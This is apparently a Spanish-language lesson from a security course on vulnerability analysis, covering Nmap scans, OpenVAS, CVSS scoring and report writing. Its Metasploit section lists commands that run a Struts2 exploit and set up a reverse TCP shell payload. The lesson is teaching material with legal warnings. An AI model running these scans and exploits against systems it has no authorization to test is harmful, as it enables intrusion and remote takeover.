🔍 Análisis de Vulnerabilidades

Lección 5 de 6 — Herramientas, metodologías y frameworks para identificar y evaluar vulnerabilidades en sistemas.

1. Nmap — Escaneo de Red y Descubrimiento

Nmap (Network Mapper) es la herramienta estándar para descubrir hosts, puertos abiertos y servicios en una red.

Comandos esenciales

# Escaneo básico de puertos
nmap 192.168.1.1

# Escaneo de todos los puertos (1-65535)
nmap -p- 192.168.1.1

# Detección de versión de servicios
nmap -sV 192.168.1.1

# Detección de SO
nmap -O 192.168.1.1

# Escaneo completo (versión + SO + scripts)
nmap -A 192.168.1.1

# Escaneo sigiloso (SYN scan)
nmap -sS 192.168.1.1

# Escaneo de red completa
nmap -sn 192.168.1.0/24

# Con scripts NSE (Nmap Scripting Engine)
nmap --script vuln 192.168.1.1
nmap --script http-headers,http-title 192.168.1.1
💡 Consejo: usa -sV --version-intensity 9 para detectar versiones con mayor precisión. Combina con --script vuln para detectar vulnerabilidades conocidas.

2. OpenVAS / Greenbone — Escáner de Vulnerabilidades

OpenVAS (Open Vulnerability Assessment System) es un escáner completo de vulnerabilidades, ahora parte de Greenbone Security Manager.

Instalación y uso básico

# Instalación en Debian/Ubuntu
apt install openvas
gvm-setup               # Configuración inicial (descarga feeds)
gvm-start               # Iniciar servicios

# Escaneo por línea de comandos
gvm-cli --gmp-username admin --gmp-password pass \
    socket --xmlfile scan-config.xml

OpenVAS produce informes detallados con CVSS scores, referencias CVE y recomendaciones de mitigación.

3. CVSS — Common Vulnerability Scoring System

CVSS es un sistema estandarizado (FIRST.org) para puntuar la severidad de vulnerabilidades. Actualmente en versión 4.0.

Severidad Rango CVSS v3 Color
CRÍTICO 9.0 - 10.0 Púrpura
ALTO 7.0 - 8.9 Rojo
MEDIO 4.0 - 6.9 Naranja
BAJO 0.1 - 3.9 Amarillo
NINGUNO 0.0 Gris

Métricas base de CVSS

# Ejemplo: Log4Shell (CVE-2021-44228)
# CVSS: 10.0 (CRÍTICO)
# AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H
# → Explotación remota, sin autenticación, impacto total en CIA

4. Informes de Vulnerabilidades

Un informe profesional debe incluir:

  1. Resumen ejecutivo: para la dirección (riesgos de negocio, no tecnicismos).
  2. Alcance: qué sistemas fueron evaluados, metodología.
  3. Hallazgos: lista de vulnerabilidades con severidad (CVSS).
  4. Detalle técnico: CVE, descripción, prueba de concepto (PoC), sistemas afectados.
  5. Recomendaciones: pasos concretos para mitigar cada vulnerabilidad.
  6. Plan de remediación: prioridades y plazos sugeridos.
⚠️ Importante: Nunca incluyas credenciales reales o datos sensibles en informes compartidos. Usa formato cifrado (PDF protegido) para distribución.

5. Metasploit Framework — Pentesting Básico

Metasploit es el framework más popular para desarrollar y ejecutar exploits. Uso exclusivo en entornos autorizados.

# Iniciar Metasploit
msfconsole

# Buscar un exploit para una vulnerabilidad específica
msf6 > search log4shell
msf6 > search type:exploit platform:linux

# Usar un módulo
msf6 > use exploit/multi/http/struts2_rest_xstream
msf6 > show options
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT 8080
msf6 > check              # Verificar si el objetivo es vulnerable
msf6 > exploit            # Ejecutar exploit

# Payloads comunes
msf6 > set PAYLOAD linux/x64/shell/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > set LPORT 4444

Módulos de Metasploit

⚠️ Advertencia legal: Metasploit solo debe usarse en sistemas que posees o con autorización explícita por escrito. El uso no autorizado es ilegal en la mayoría de jurisdicciones.

🔄 Ciclo de Vida del Análisis de Vulnerabilidades

  1. Descubrimiento: identificar activos (Nmap, Shodan).
  2. Evaluación: escanear vulnerabilidades (OpenVAS, Nessus).
  3. Análisis: priorizar según CVSS, contexto del negocio.
  4. Remediación: aplicar parches, configuraciones, WAF.
  5. Verificación: re-escanear para confirmar que se mitigó.
  6. Reporte: documentar el proceso y resultados.

📌 Resumen